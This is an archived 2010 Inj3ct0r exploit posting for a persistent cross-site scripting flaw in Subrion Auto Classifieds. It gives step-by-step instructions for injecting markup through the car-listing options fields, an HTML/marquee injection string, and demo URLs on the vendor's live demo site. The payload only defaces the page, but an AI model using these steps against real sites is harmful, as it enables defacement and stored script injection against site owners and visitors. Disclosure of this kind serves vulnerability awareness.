Home / exploits Subrion Auto Classifieds Persistent Xss Vulnerability
Posted on 17 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Subrion Auto Classifieds Persistent Xss Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================== Subrion Auto Classifieds Persistent Xss Vulnerability ===================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_<_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ >> Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 Name :Subrion Auto Classifieds Persistent Xss Vulnerability Date : july 17,2010 Critical Level : HIGH vendor URL :http://www.subrion.com/product/autos.html google dork:? 2010 Powered by Subrion CMS Author : Sid3^effects aKa HaRi special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_,SeeMe,RoadKiller greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz ####################################################################################################### Description: Subrion Auto Classifieds is a powerful, highly customizable classifieds script for auto sales sites. It is written in PHP with MySQL. Due to its easy manageable administrator Web interface and its great amount of features it is an excellent choice if you need a cars classifieds portal or an auto auction site. ####################################################################################################### Xploit:Persistent Xss Vulnerability Step 1 : Register Step 2 : Submit your auto. DEMO URL :http://autos.subrion.com/autos/submit.php Step 3 : The attacker can insert their xss scripts in the options. Attack Pattern :">><marquee><h1>XSS3d By Sid3^effects</h1><marquee> Step 4 : Now check your automobile :) DEMO URL :http://autos.subrion.com/autos/account-autos.html My demo :http://autos.subrion.com/autos/Acura/MDX/Acura-MDX-marquee-h1-XSS3d-By-Sid3-effects-h1-marqu-a6.html ####################################################################################################### # 0day no more # Sid3^effects # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-17]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
